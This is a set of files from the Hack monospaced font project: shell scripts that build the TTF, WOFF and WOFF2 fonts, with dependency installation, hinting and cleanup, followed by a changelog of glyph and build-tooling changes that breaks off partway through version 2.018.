#!/bin/sh # ///////////////////////////////////////////////////////////////// # # build-ttf.sh # A shell script that builds the Hack ttf fonts from UFO source # Copyright 2018 Christopher Simpkins # MIT License # # Usage: ./build-ttf.sh (--install-dependencies) # Arguments: # --install-dependencies (optional) - installs all # build dependencies prior to the build script execution # # ///////////////////////////////////////////////////////////////// # ttfautohint local install path from Werner Lemberg's ttfautohint-build.sh install script # - This is revised to ttfautohint on the user's PATH if this local install is not identified # then the identified ttfautohint is used to execute hinting. Versions of ttfautohint < 1.6 exit with status # code 1 due to use of -R option # - The intent is to support use of ttfautohint installed on a user's PATH (e.g. they've previously installed it) TTFAH="$HOME/ttfautohint-build/local/bin/ttfautohint" # test for number of arguments if [ $# -gt 1 ] then echo "Inappropriate arguments included in your command." 1>&2 echo "Usage: ./build-ttf.sh (--install-dependencies)" 1>&2 exit 1 fi # Optional build dependency install request with syntax `./build.sh --install-dependencies` if [ "$1" = "--install-dependencies" ] then # fontmake pip install --upgrade fontmake # fontTools (installed with fontmake at this time. leave this as dependency check as python scripts for fixes require it should fontTools eliminate dep) pip install --upgrade fonttools # ttfautohint v1.6 (must be pinned to v1.6 and above for Hack instruction sets) tools/scripts/install/ttfautohint-build.sh fi # confirm executable installs and library imports for build dependencies INSTALLFLAG=0 echo "Confirming that build dependencies are installed..." echo " " # fontmake installed if ! which fontmake then echo "Unable to install fontmake with 'pip install fontmake'. Please attempt a manual install of this build dependency and then repeat your build attempt." 1>&2 INSTALLFLAG=1 fi # fontTools python library can be imported if ! python -c "import fontTools" then echo "Unable to install fontTools with 'pip install fonttools'. Please attempt a manual install of this build dependency and then repeat your build attempt." 1>&2 INSTALLFLAG=1 else echo "fontTools Python library identified" fi # ttfautohint installed # - tests for install to local path from ttfautohint-build.sh script # - if not found on this path, tests for install on system PATH - if found, revises TTFAH to the string "ttfautohint" for execution of instruction sets if ! [ -f "$TTFAH" ] then if ! which ttfautohint then echo "Unable to install ttfautohint from source. Please attempt a manual install of this build dependency and then repeat your build attempt." 1>&2 INSTALLFLAG=1 else TTFAH="ttfautohint" # revise TTFAH variable to ttfautohint installed on the user's PATH for excecution of hints below fi fi # if any of the dependency installs failed, exit and do not attempt build, notify user if [ $INSTALLFLAG -eq 1 ] then echo "Build canceled." 1>&2 exit 1 fi # Desktop ttf font build echo "Starting build..." echo " " # remove any existing release files from the build directory if [ -f "build/ttf/Hack-Regular.ttf" ]; then rm build/ttf/Hack-Regular.ttf fi if [ -f "build/ttf/Hack-Italic.ttf" ]; then rm build/ttf/Hack-Italic.ttf fi if [ -f "build/ttf/Hack-Bold.ttf" ]; then rm build/ttf/Hack-Bold.ttf fi if [ -f "build/ttf/Hack-BoldItalic.ttf" ]; then rm build/ttf/Hack-BoldItalic.ttf fi # remove master_ttf directory if a previous build failed + exited early and it was not cleaned up if [ -d "master_ttf" ]; then rm -rf master_ttf fi # build regular set if ! fontmake -u "source/Hack-Regular.ufo" -o ttf then echo "Unable to build the Hack-Regular variant set. Build canceled." 1>&2 exit 1 fi # build bold set if ! fontmake -u "source/Hack-Bold.ufo" -o ttf then echo "Unable to build the Hack-Bold variant set. Build canceled." 1>&2 exit 1 fi # build italic set if ! fontmake -u "source/Hack-Italic.ufo" -o ttf then echo "Unable to build the Hack-Italic variant set. Build canceled." 1>&2 exit 1 fi # build bold italic set if ! fontmake -u "source/Hack-BoldItalic.ufo" -o ttf then echo "Unable to build the Hack-BoldItalic variant set. Build canceled." 1>&2 exit 1 fi # Desktop ttf font post build fixes # DSIG table fix with adapted fontbakery Python script echo " " echo "Attempting DSIG table fixes with fontbakery..." echo " " if ! python postbuild_processing/fixes/fix-dsig.py master_ttf/*.ttf then echo "Unable to complete DSIG table fixes on the release files" exit 1 fi # fstype value fix with adapted fontbakery Python script echo " " echo "Attempting fstype fixes with fontbakery..." echo " " if ! python postbuild_processing/fixes/fix-fstype.py master_ttf/*.ttf then echo "Unable to complete fstype fixes on the release files" exit 1 fi # Desktop ttf font hinting echo " " echo "Attempting ttfautohint hinting..." echo " " # make a temporary directory for the hinted files mkdir master_ttf/hinted # Hack-Regular.ttf if ! "$TTFAH" -l 6 -r 50 -x 10 -H 181 -D latn -f latn -w G -W -t -X "" -I -m "postbuild_processing/tt-hinting/Hack-Regular-TA.txt" "master_ttf/Hack-Regular.ttf" "master_ttf/hinted/Hack-Regular.ttf" then echo "Unable to execute ttfautohint on the Hack-Regular variant set. Build canceled." 1>&2 exit 1 fi echo "master_ttf/Hack-Regular.ttf - successful hinting with ttfautohint" # Hack-Bold.ttf if ! "$TTFAH" -l 6 -r 50 -x 10 -H 260 -D latn -f latn -w G -W -t -X "" -I -m "postbuild_processing/tt-hinting/Hack-Bold-TA.txt" "master_ttf/Hack-Bold.ttf" "master_ttf/hinted/Hack-Bold.ttf" then echo "Unable to execute ttfautohint on the Hack-Bold variant set. Build canceled." 1>&2 exit 1 fi echo "master_ttf/Hack-Bold.ttf - successful hinting with ttfautohint" # Hack-Italic.ttf if ! "$TTFAH" -l 6 -r 50 -x 10 -H 145 -D latn -f latn -w G -W -t -X "" -I -m "postbuild_processing/tt-hinting/Hack-Italic-TA.txt" "master_ttf/Hack-Italic.ttf" "master_ttf/hinted/Hack-Italic.ttf" then echo "Unable to execute ttfautohint on the Hack-Italic variant set. Build canceled." 1>&2 exit 1 fi echo "master_ttf/Hack-Italic.ttf - successful hinting with ttfautohint" # Hack-BoldItalic.ttf if ! "$TTFAH" -l 6 -r 50 -x 10 -H 265 -D latn -f latn -w G -W -t -X "" -I -m "postbuild_processing/tt-hinting/Hack-BoldItalic-TA.txt" "master_ttf/Hack-BoldItalic.ttf" "master_ttf/hinted/Hack-BoldItalic.ttf" then echo "Unable to execute ttfautohint on the Hack-BoldItalic variant set. Build canceled." 1>&2 exit 1 fi echo "master_ttf/Hack-BoldItalic.ttf - successful hinting with ttfautohint" echo " " # Move release files to build directory echo " " # create directory if it does not exist # (occurs with git + empty directories) if ! [ -d build/ttf ]; then mkdir build/ttf fi mv master_ttf/hinted/Hack-Regular.ttf build/ttf/Hack-Regular.ttf echo "Regular ttf build path: build/ttf/Hack-Regular.ttf" mv master_ttf/hinted/Hack-Italic.ttf build/ttf/Hack-Italic.ttf echo "Italic ttf build path: build/ttf/Hack-Italic.ttf" mv master_ttf/hinted/Hack-Bold.ttf build/ttf/Hack-Bold.ttf echo "Bold ttf build path: build/ttf/Hack-Bold.ttf" mv master_ttf/hinted/Hack-BoldItalic.ttf build/ttf/Hack-BoldItalic.ttf echo "Bold Italic ttf build path: build/ttf/Hack-BoldItalic.ttf" # Remove master_ttf directory rm -rf master_ttf
Shell Script
Hack/build-woff.sh
#!/bin/sh # /////////////////////////////////////////////////////////////////// # # build-woff.sh # A shell script that builds the Hack woff web fonts from ttf files # Copyright 2018 Christopher Simpkins # MIT License # # Usage: ./build-woff.sh (--install-dependencies) # Arguments: # --install-dependencies (optional) - installs all # build dependencies prior to the build script execution # # NOTE: If you change the source, you must build new ttf files # with build.sh PRIOR to execution of this script. # This script builds directly from previous ttf builds, # not source files. # # /////////////////////////////////////////////////////////////////// # The sfnt2woff-zopfli build directory. BUILD="$HOME/sfnt2woff-zopfli-build" # sfnt2woff-zopfli version SFNTWOFF_VERSION="1.1.0" SFNTWOFF="sfnt2woff-zopfli-$SFNTWOFF_VERSION" # Path to sfnt2woff-zopfli executable SFNTWOFF_BIN="$BUILD/$SFNTWOFF/sfnt2woff-zopfli" ZOPFLI_ITERATIONS="3" # The font build directory paths and file paths for the woff builds TTF_BUILD="build/ttf" WOFF_BUILD="build/web/fonts" REGULAR_TTF="Hack-Regular.ttf" REGULAR_PRE="Hack-Regular.woff" REGULAR_WOFF="hack-regular.woff" BOLD_TTF="Hack-Bold.ttf" BOLD_PRE="Hack-Bold.woff" BOLD_WOFF="hack-bold.woff" ITALIC_TTF="Hack-Italic.ttf" ITALIC_PRE="Hack-Italic.woff" ITALIC_WOFF="hack-italic.woff" BOLDITALIC_TTF="Hack-BoldItalic.ttf" BOLDITALIC_PRE="Hack-BoldItalic.woff" BOLDITALIC_WOFF="hack-bolditalic.woff" # test for number of arguments if [ $# -gt 1 ] then echo "Inappropriate arguments included in your command." 1>&2 echo "Usage: ./build-woff.sh (--install-dependencies)" 1>&2 exit 1 fi # Optional build dependency install request with syntax `./build-web.sh --install-dependencies` if [ "$1" = "--install-dependencies" ] then # define the current directory (Hack repository) CUR_DIR=$(pwd) if test -d "$BUILD" -o -f "$BUILD"; then echo "Build directory \`$BUILD' must not exist." exit 1 fi mkdir "$BUILD" cd "$BUILD" || exit 1 echo "#####" echo "Download archive." echo "#####" curl -L -O "https://github.com/bramstein/sfnt2woff-zopfli/archive/v$SFNTWOFF_VERSION.tar.gz" echo "#####" echo "Extract archives." echo "#####" tar -xzvf "v$SFNTWOFF_VERSION.tar.gz" cd "$SFNTWOFF" || exit 1 echo "#####" echo "Build $SFNTWOFF." echo "#####" make # make Hack repository the current directory again following the build cd "$CUR_DIR" || exit 1 fi if [ -f "$SFNTWOFF_BIN" ]; then echo "Beginning web font build with $SFNTWOFF" else echo "Unable to locate sfnt2woff-zopfli on the path $SFNTWOFF_BIN. Please attempt a manual install of this build dependency and then repeat your build attempt." 1>&2 exit 1 fi # Build woff files from ttf files # regular set if ! "$SFNTWOFF_BIN" -n $ZOPFLI_ITERATIONS "$TTF_BUILD/$REGULAR_TTF"; then echo "Failed to build $REGULAR_WOFF from $REGULAR_TTF." 1>&2 exit 1 else echo "Regular woff set successfully built from $REGULAR_TTF" fi # bold set if ! "$SFNTWOFF_BIN" -n $ZOPFLI_ITERATIONS "$TTF_BUILD/$BOLD_TTF"; then echo "Failed to build $BOLD_WOFF from $BOLD_TTF" 1>&2 exit 1 else echo "Bold woff set successfully built from $BOLD_TTF" fi # italic set if ! "$SFNTWOFF_BIN" -n $ZOPFLI_ITERATIONS "$TTF_BUILD/$ITALIC_TTF"; then echo "Failed to build $BOLD_WOFF from $ITALIC_TTF" 1>&2 exit 1 else echo "Italic woff set successfully built from $ITALIC_TTF" fi # bold italic set if ! "$SFNTWOFF_BIN" -n $ZOPFLI_ITERATIONS "$TTF_BUILD/$BOLDITALIC_TTF"; then echo "Failed to build $BOLDITALIC_WOFF from $BOLDITALIC_TTF" 1>&2 exit 1 else echo "Bold Italic woff set successfully built from $BOLDITALIC_TTF" fi echo "Moving woff files to build directory..." # create directory if it does not exist # (occurs with git + empty directories) if ! [ -d "$WOFF_BUILD" ]; then mkdir $WOFF_BUILD fi # move woff files to appropriate build directory mv "$TTF_BUILD/$REGULAR_PRE" "$WOFF_BUILD/$REGULAR_WOFF" mv "$TTF_BUILD/$BOLD_PRE" "$WOFF_BUILD/$BOLD_WOFF" mv "$TTF_BUILD/$ITALIC_PRE" "$WOFF_BUILD/$ITALIC_WOFF" mv "$TTF_BUILD/$BOLDITALIC_PRE" "$WOFF_BUILD/$BOLDITALIC_WOFF" echo " " if [ -f "$WOFF_BUILD/$REGULAR_WOFF" ]; then echo "Regular woff build path: $WOFF_BUILD/$REGULAR_WOFF" fi if [ -f "$WOFF_BUILD/$BOLD_WOFF" ]; then echo "Bold woff build path: $WOFF_BUILD/$BOLD_WOFF" fi if [ -f "$WOFF_BUILD/$ITALIC_WOFF" ]; then echo "Italic woff build path: $WOFF_BUILD/$ITALIC_WOFF" fi if [ -f "$WOFF_BUILD/$BOLDITALIC_WOFF" ]; then echo "Bold Italic woff build path: $WOFF_BUILD/$BOLDITALIC_WOFF" fi
Shell Script
Hack/build-woff2.sh
#!/bin/sh # /////////////////////////////////////////////////////////////////// # # build-woff2.sh # A shell script that builds the Hack woff2 web fonts from ttf files # Copyright 2018 Christopher Simpkins # MIT License # # Usage: ./build-woff2.sh (--install-dependencies) # Arguments: # --install-dependencies (optional) - installs all # build dependencies prior to the build script execution # # NOTE: If you change the source, you must build new ttf files # with build.sh PRIOR to execution of this script. # This script builds directly from previous ttf builds, # not source files. # # /////////////////////////////////////////////////////////////////// # The woff2 git clone directory. BUILD="$HOME" INST="$HOME/woff2" # woff2 executable path WOFF2_BIN="$BUILD/woff2/woff2_compress" # The font build directory paths and file paths for the woff builds TTF_BUILD="build/ttf" WOFF_BUILD="build/web/fonts" REGULAR_TTF="Hack-Regular.ttf" REGULAR_PRE="Hack-Regular.woff2" REGULAR_WOFF="hack-regular.woff2" BOLD_TTF="Hack-Bold.ttf" BOLD_PRE="Hack-Bold.woff2" BOLD_WOFF="hack-bold.woff2" ITALIC_TTF="Hack-Italic.ttf" ITALIC_PRE="Hack-Italic.woff2" ITALIC_WOFF="hack-italic.woff2" BOLDITALIC_TTF="Hack-BoldItalic.ttf" BOLDITALIC_PRE="Hack-BoldItalic.woff2" BOLDITALIC_WOFF="hack-bolditalic.woff2" # test for number of arguments if [ $# -gt 1 ] then echo "Inappropriate arguments included in your command." 1>&2 echo "Usage: ./build-woff2.sh (--install-dependencies)" 1>&2 exit 1 fi # Optional build dependency install request with syntax `./build-web.sh --install-dependencies` if [ "$1" = "--install-dependencies" ] then # define the current directory (Hack repository) CUR_DIR=$(pwd) if test -d "$INST" -o -f "$INST"; then echo "Build directory \`$INST' must not exist." exit 1 fi cd "$BUILD" || exit 1 echo "#####" echo "git clone woff2 project" echo "#####" # clone the Source Foundry fork of the woff2 repo # contains fix for OS X build bug - https://github.com/google/woff2/issues/73 # recursive flag to clone the brotli submodule within the woff2 repo git clone --recursive https://github.com/source-foundry/woff2.git cd "$INST" || exit 1 echo "#####" echo "Build woff2" echo "#####" make clean all # make Hack repository the current directory again following the build cd "$CUR_DIR" || exit 1 fi if [ -f "$WOFF2_BIN" ]; then echo "Beginning web font build with $WOFF2_BIN" else echo "Unable to locate woff2_compress on path $WOFF2_BIN. Please attempt a manual install of this build dependency and then repeat your build attempt." 1>&2 exit 1 fi # Build woff2 files from ttf files # regular set if ! "$WOFF2_BIN" "$TTF_BUILD/$REGULAR_TTF"; then echo "Failed to build woff2 from $REGULAR_TTF." 1>&2 exit 1 else echo "Regular woff2 font set successfully built from $REGULAR_TTF" fi # bold set if ! "$WOFF2_BIN" "$TTF_BUILD/$BOLD_TTF"; then echo "Failed to build woff2 from $BOLD_TTF" 1>&2 exit 1 else echo "Bold woff2 set successfully built from $BOLD_TTF" fi # italic set if ! "$WOFF2_BIN" "$TTF_BUILD/$ITALIC_TTF"; then echo "Failed to build woff2 from $ITALIC_TTF" 1>&2 exit 1 else echo "Italic woff2 set successfully built from $ITALIC_TTF" fi # bold italic set if ! "$WOFF2_BIN" "$TTF_BUILD/$BOLDITALIC_TTF"; then echo "Failed to build woff2 from $BOLDITALIC_TTF" 1>&2 exit 1 else echo "Bold Italic woff2 set successfully built from $BOLDITALIC_TTF" fi echo "Moving woff2 files to build directory..." # create directory if it does not exist # (occurs with git + empty directories) if ! [ -d "$WOFF_BUILD" ]; then mkdir $WOFF_BUILD fi # move woff2 files to appropriate build directory mv "$TTF_BUILD/$REGULAR_PRE" "$WOFF_BUILD/$REGULAR_WOFF" mv "$TTF_BUILD/$BOLD_PRE" "$WOFF_BUILD/$BOLD_WOFF" mv "$TTF_BUILD/$ITALIC_PRE" "$WOFF_BUILD/$ITALIC_WOFF" mv "$TTF_BUILD/$BOLDITALIC_PRE" "$WOFF_BUILD/$BOLDITALIC_WOFF" echo " " if [ -f "$WOFF_BUILD/$REGULAR_WOFF" ]; then echo "Regular woff2 build path: $WOFF_BUILD/$REGULAR_WOFF" fi if [ -f "$WOFF_BUILD/$BOLD_WOFF" ]; then echo "Bold woff2 build path: $WOFF_BUILD/$BOLD_WOFF" fi if [ -f "$WOFF_BUILD/$ITALIC_WOFF" ]; then echo "Italic woff2 build path: $WOFF_BUILD/$ITALIC_WOFF" fi if [ -f "$WOFF_BUILD/$BOLDITALIC_WOFF" ]; then echo "Bold Italic woff2 build path: $WOFF_BUILD/$BOLDITALIC_WOFF" fi
Markdown
Hack/CHANGELOG.md
# Version 3.003 - U+005B, increased length of square brackets' horizontal strokes (symmetrically reducing left and right sidebearing), all variants - U+005D, increased length of square brackets' horizontal strokes (symmetrically reducing left and right sidebearing), all variants - U+0051, extended length of tail, all variants - U+051A, extended length of tail, all variants - U+0061, simplified and improved contours, all variants - U+0062, simplified and improved contours, all variants - U+0063, simplified and improved contours, all variants - U+0064, simplified and improved contours, all variants - U+0065, simplified and improved contours, all variants - U+0066, simplified and improved contours, all variants - U+0067, simplified and improved contours, all variants - U+0068, simplified and improved contours, all variants - U+0069, simplified and improved contours, all variants - U+006A, simplified and improved contours, all variants - U+006B, simplified and improved contours, all variants - U+006C, simplified and improved contours, all variants - U+006D, simplified and improved contours, all variants - U+006E, simplified and improved contours, all variants - U+006F, simplified and improved contours, all variants - U+0070, simplified and improved contours, all variants - U+0071, simplified and improved contours, all variants - U+0072, simplified and improved contours, all variants - U+0073, simplified and improved contours, all variants - U+0074, simplified and improved contours, all variants - U+0075, simplified and improved contours, all variants - U+0076, simplified and improved contours, all variants - U+0077, simplified and improved contours, all variants - U+0078, simplified and improved contours, all variants - U+0079, simplified and improved contours, all variants - U+007A, simplified and improved contours, all variants - added config/fontconfig/45-Hack.conf for use on Linux distros to define Hack as a monospaced typeface - added ttdiff.sh shell script for OpenType table diffs of ttx XML dumps of font binaries - added checksum.py to scripts directory, supports the generation of SHA1 checksum files of font binaries and ttx dumps of OpenType tables - ttfautohint-build.sh, fixed backtick and expr syntax shellcheck warnings (SC2003/2006) - converted to Semaphore CI (from Travis CI) as CI testing service, eliminated .travis.yml settings file # Version 3.002 - bugfix for https://github.com/source-foundry/Hack/issues/377 (affects Windows users) - bugfix for https://github.com/source-foundry/Hack/issues/379 (affects Linux users) - bugfix included removal of blue zone reference font in ttfautohint instruction set processing (-R flag). This led to variable lowercase glyph heights on Linux and Windows platforms # Version 3.001 - U+017F, added long s glyph to all four variant sets, completes Latin Extended A character sets - U+2024, added onedotenleader glyph to all four variant sets (general punctuation set) - U+2025, added twodotenleader glyph to all four variant sets (general punctuation set) - U+2027, added hyphenationpoint glyph to all four variant sets (general punctuation set) - U+2032, added minute glyph to all four variant sets (general punctuation set) - U+2033, added second glyph to all four variant sets (general punctuation set) - U+2034, modified glyph name to "millisecond" in all four variant sets (general punctuation set) - U+2012, modified figure dash to width of numeral glyphs in all four variant sets - U+2013, modified en dash to half width of em in all four variant sets - U+2014, modified em dash, slight adjustment to height in all four variant sets, horizontal position in italic and bold italic sets - U+0031, increased angle of top stroke vs. horizontal, all sets (legibility vs. U+006C) - U+0031, increased length of the top stroke, all sets (legibility vs. U+006C) - U+0031, decreased width of the top stroke, bold and bold italic sets (legibility vs. U+006C) - removed name table, ID=5 record ttfautohint metadata (previously included in this version string) - updated Harbuzz build dependency to v1.7.4 - updated FreeType build dependency to v2.8.1 - removed FreeType build patches in ttfautohint-build.sh script (not necessary after above upgrade) - modified ttfautohint-build.sh license to MIT License - added ink CSS file templates for automated git sha1 short code writes for releases - added new CSS file template build shell script - added new make target for CSS template file builds (make css) # Version 3.000 ### New license - Eliminated Hack Open Font License - Added MIT License for Hack work - These license changes eliminated the Reserved Font Name "Hack" in the typeface license - No changes to co-licensure with the Bitstream Vera license from upstream source ### New source and build tooling - converted to valid UFO v2 source files with cubic curves - added automated build from scratch approach with make + FLOSS software only for desktop fonts - added automated build from scratch approach with make + FLOSS software only for web fonts (complete sets and subsets) - added automated cross platform build dependency installation as a make target - added ttfautohint build from source scripting support (includes support for builds on OS X platform) - added automated ttf build autohinting scripting with ttfautohint as part of the make build workflow - added Font Bakery fstype post-compilation fix - added Font Bakery DSIG table post-compilation fix - modified default zopfli iterations to 3 from 15 for woff builds (improved build time vs file size balance) - created a (workaround) approach to web font subset builds from UFO source files with fontmake - created new font archive preparation script - repository path modifications to support above changes - eliminated old, unnecessary repository scripts - added fontmake build dependency - added fontTools build dependency - added ttfautohint build dependency (includes Harfbuzz and FreeType build dependencies) - added Font Bakery fstype post-compilation fix dependency (script housed in repo) - added Font Bakery DSIG table fix dependency (script housed in repo) - added sfnt2woff-zopfli build dependency - added woff2 build dependency (uses customized Source Foundry fork that is modified to address build bug on OS X platforms) - added Source Foundry SRC vendor ID to source files ### Continuous integration testing - added Travis CI desktop font build testing on Linux and OS X platforms - added Travis CI web font build testing on Linux and OS X platforms - added ufolint UFO source file linting to CI testing - added shellcheck shell script source file linting to CI testing ### Desktop font build changes - eliminated otf builds ### Web font build changes - eliminated eot web font builds - eliminated ttf web font builds - modified CSS file paths (affects web font CDN URL for all v3.0+ builds) ### Design changes - added U+0114 and U+0115, all sets - added U+012C and U+012D, all sets - added U+014E and U+014F, all sets - Bold set: reduced dimensions of middle dot glyph (U+00B7) - improved design of the Powerline glyph set (addresses alignment rendering on Linux and Windows platforms) - added web font subset character set targets of ASCII, Latin-1, Latin Extended A, General Punctuation, and Currency sets - ttfautohint updated to v1.6 - added Regular set as blue zone reference font for ttfautohint ttf build autohinting - defined x height pixel grid rounding up size range as 6ppem - 10ppem for ttfautohint ttf build autohinting - examined and improved manual hinting adjustments across the entire ASCII glyph set x sizes 8 - 14 ppem - Regular set: modified manual hints U+0023 @ size 13 - Regular set: modified manual hints U+0025 @ sizes 10, 11, 14 - Regular set: modified manual hints U+002B @ sizes 12, 13 - Regular set: modified manual hints U+0030 @ 8, 12, 13, 14 - Bold set: modified manual hints U+0021 @ size 14 - Bold set: modified manual hints U+0025 @ sizes 10, 11, 14 - Bold set: modified manual hints U+002B @ sizes 10, 11 - Bold set: modified manual hints U+0038 @ sizes 12, 13, 14 - Italic set: modified manual hints U+0025 @ sizes 10, 11, 14 - BoldItalic set: modified manual hints U+002B @ sizes 10, 11 ### Documentation changes - added design guidelines to CONTRIBUTING.md documentation - added issue reporting guidelines to CONTRIBUTING.md documentation - added pull request guidelines to CONTRIBUTING.md documentation - added contributors definition to CONTRIBUTING.md documentation - added build documentation in docs/BUILD.md - added Frequently Asked Questions documentation as FAQ.md ### Fixes - modified openTypeNamePreferredSubfamilyName key definition in fontinfo.plist to support proper naming on Windows platform - added middle dot glyph (U+00B7) to BoldItalic set - fixed superscript OpenType features scripts in features.fea x all four variant sets # Version 2.020 - divided the vertical stroke in the pipe glyph (U+007C), italic and bold italic sets - modified U+007C hints in TrueType builds at 6, 7, 10, 11, 12, 13, 14 ppem italic set - modified U+007C hints in TrueType builds at 6, 7, 10, 14 ppem bold italic set - modified slant angle and stroke length (U+005C), italic and bold italic sets - centered U+007C and U+005C, all sets - modified zero (U+0030) oval fill hints in regular set - added Powerline glyphs to the bold, italic, and bold italic sets - U+2502 upper terminal to 1950, lower terminal to -530, all sets - U+2503 upper terminal to 1950, lower terminal to -530, all sets - U+250C lower terminal to -530, all sets - U+250D lower terminal to -530, all sets - U+250E lower terminal to -530, all sets - U+250F lower terminal to -530, all sets - U+2510 lower terminal to -530, all sets - U+2511 lower terminal to -530, all sets - U+2512 lower terminal to -530, all sets - U+2513 lower terminal to -530, all sets - U+2514 upper terminal to 1950, all sets - U+2515 upper terminal to 1950, all sets - U+2516 upper terminal to 1950, all sets - U+2517 upper terminal to 1950, all sets - U+2518 upper terminal to 1950, all sets - U+2519 upper terminal to 1950, all sets - U+251A upper terminal to 1950, all sets - U+251B upper terminal to 1950, all sets - U+251C upper terminal to 1950, lower terminal to -530, all sets - U+251D upper terminal to 1950, lower terminal to -530, all sets - U+251E upper terminal to 1950, lower terminal to -530, all sets - U+251F upper terminal to 1950, lower terminal to -530, all sets - U+2520 upper terminal to 1950, lower terminal to -530, all sets - U+2521 upper terminal to 1950, lower terminal to -530, all sets - U+2522 upper terminal to 1950, lower terminal to -530, all sets - U+2523 upper terminal to 1950, lower terminal to -530, all sets - U+2524 upper terminal to 1950, lower terminal to -530, all sets - U+2525 upper terminal to 1950, lower terminal to -530, all sets - U+2526 upper terminal to 1950, lower terminal to -530, all sets - U+2527 upper terminal to 1950, lower terminal to -530, all sets - U+2528 upper terminal to 1950, lower terminal to -530, all sets - U+2529 upper terminal to 1950, lower terminal to -530, all sets - U+252A upper terminal to 1950, lower terminal to -530, all sets - U+252B upper terminal to 1950, lower terminal to -530, all sets - U+252C lower terminal to -530, all sets - U+252D lower terminal to -530, all sets - U+252E lower terminal to -530, all sets - U+252F lower terminal to -530, all sets - U+2530 lower terminal to -530, all sets - U+2531 lower terminal to -530, all sets - U+2532 lower terminal to -530, all sets - U+2533 lower terminal to -530, all sets - U+2534 upper terminal to 1950, all sets - U+2535 upper terminal to 1950, all sets - U+2536 upper terminal to 1950, all sets - U+2537 upper terminal to 1950, all sets - U+2538 upper terminal to 1950, all sets - U+2539 upper terminal to 1950, all sets - U+253A upper terminal to 1950, all sets - U+253B upper terminal to 1950, all sets - U+252C upper terminal to 1950, lower terminal to -530, all sets - U+252D upper terminal to 1950, lower terminal to -530, all sets - U+253E upper terminal to 1950, lower terminal to -530, all sets - U+253F upper terminal to 1950, lower terminal to -530, all sets - U+2540 upper terminal to 1950, lower terminal to -530, all sets - U+2541 upper terminal to 1950, lower terminal to -530, all sets - U+2542 upper terminal to 1950, lower terminal to -530, all sets - U+2543 upper terminal to 1950, lower terminal to -530, all sets - U+2544 upper terminal to 1950, lower terminal to -530, all sets - U+2545 upper terminal to 1950, lower terminal to -530, all sets - U+2546 upper terminal to 1950, lower terminal to -530, all sets - U+2547 upper terminal to 1950, lower terminal to -530, all sets - U+2548 upper terminal to 1950, lower terminal to -530, all sets - U+2549 upper terminal to 1950, lower terminal to -530, all sets - U+254A upper terminal to 1950, lower terminal to -530, all sets - U+254B upper terminal to 1950, lower terminal to -530, all sets - U+2551 upper terminal to 1950, lower terminal to -530, all sets - U+2552 lower terminal to -530, all sets - U+2553 lower terminals to -530, all sets - U+2554 lower terminals to -530, all sets - U+2555 lower terminal to -530, all sets - U+2556 lower terminals to -530, all sets - U+2557 lower terminals to -530, all sets - U+2558 upper terminal to 1950, all sets - U+2558 upper terminals to 1950, all sets - U+2559 upper terminals to 1950, all sets - U+255A upper terminals to 1950, all sets - U+255B upper terminal to 1950, all sets - U+255C upper terminals to 1950, all sets - U+255D upper terminals to 1950, all sets - U+255E upper terminal to 1950, lower terminal to -530, all sets - U+255F upper terminals to 1950, lower terminals to -530, all sets - U+2560 upper terminals to 1950, lower terminals to -530, all sets - U+2561 upper terminal to 1950, lower terminal to -530, all sets - U+2562 upper terminals to 1950, lower terminals to -530, all sets - U+2563 upper terminals to 1950, lower terminals to -530, all sets - U+2564 lower terminal to -530, all sets - U+2565 lower terminals to -530, all sets - U+2566 lower terminals to -530, all sets - U+2567 upper terminal to 1950, all sets - U+2568 upper terminals to 1950, all sets - U+2569 upper terminals to 1950, all sets - U+256A upper terminal to 1950, lower terminal to -530, all sets - U+256B upper terminals to 1950, lower terminals to -530, all sets - U+256C upper terminals to 1950, lower terminals to -530, all sets - U+256D lower terminal to -530, all sets - U+256E lower terminal to -530, all sets - U+256F upper terminal to 1950, all sets - U+2570 upper terminal to 1950, all sets - U+2571 adjusted horizontal position and length of strokes - U+2572 adjusted horizontal position and length of strokes - U+2573 adjusted horizontal position and length of strokes - U+2575 upper terminal to 1950, all sets - U+2577 lower terminal to -530, all sets - U+2578 horizontal alignment of superior margin of the stroke (1 unit adjustment) - U+2579 upper terminal to 1950, all sets - U+257B lower terminal to -530, all sets - U+257D upper terminal to 1950, lower terminal to -530, all sets - U+257F upper terminal to 1950, lower terminal to -530, all sets - updated OpenType name table field 1 0 0 - updated OpenType name table field 3 1 1033 - new [Windows installer](https://github.com/source-foundry/Hack-windows-installer) - added line spacing adjustment shell scripts - added font-tables.py OpenType table reporting script - updated dev-versioner.py OpenType table versioning script to support UTF16 big endian encoding of nameID=5, platformID=3 name table # Version 2.019 (release build) ttf, otf, webfont builds - removed SVG from webfont releases - Corrected U+2588 glyph shape in regular set (had inappropriately small width and height) - decreased width U+2580 all sets - decreased width U+2581 all sets - decreased width U+2582 all sets - decreased width U+2583 all sets - decreased width U+2584 all sets - decreased width U+2585 all sets - decreased width U+2586 all sets - decreased width U+2857 all sets - adjusted left sidebearing U+2589 all sets - adjusted left sidebearing U+258A all sets - adjusted left sidebearing U+258B all sets - adjusted left sidebearing U+258C all sets - adjusted left sidebearing U+258D all sets - adjusted left sidebearing U+258E all sets - adjusted left sidebearing U+258F all sets - adjusted right sidebearing U+2590 all sets - decreased width of U+2594 all sets - adjusted right sidebearing U+2595 all sets - adjusted left sidebearing U+2596 all sets - adjusted right sidebearing U+2597 all sets - adjusted left sidebearing U+2598 all sets - decreased width of U+2599 all sets - decreased width of U+259A all sets - decreased width of U+259B all sets - decreased width of U+259C all sets - adjusted right sidebearing U+259D all sets - decreased width of U+259E all sets - decreased width of U+259F all sets - increased upper terminal position to 1950 units U+2580 all sets - increased upper terminal position to 1950 units U+2588 all sets - increased upper terminal position to 1950 units U+2589 all sets - increased upper terminal position to 1950 units U+258A all sets - increased upper terminal position to 1950 units U+258B all sets - increased upper terminal position to 1950 units U+258C all sets - increased upper terminal position to 1950 units U+258D all sets - increased upper terminal position to 1950 units U+258E all sets - increased upper terminal position to 1950 units U+258F all sets - increased upper terminal position to 1950 units U+2590 all sets - increased upper terminal position to 1950 units U+2594 all sets - increased upper terminal position to 1950 units U+2595 all sets - increased upper terminal position to 1950 units U+2598 all sets - increased upper terminal position to 1950 units U+2599 all sets - increased upper terminal position to 1950 units U+259A all sets - increased upper terminal position to 1950 units U+259B all sets - increased upper terminal position to 1950 units U+259C all sets - increased upper terminal position to 1950 units U+259D all sets - increased upper terminal position to 1950 units U+259E all sets - increased upper terminal position to 1950 units U+259F all sets - reverted Cyrillic lower case es glyph (U+0441) to Latin lower case c shape - reverted Cyrillic upper case es glyph (U+0421) to Latin upper case C shape # Version 2.018 (release build) ttf, otf, webfont builds Patch for missing glyphs in regular set: - added U+016C 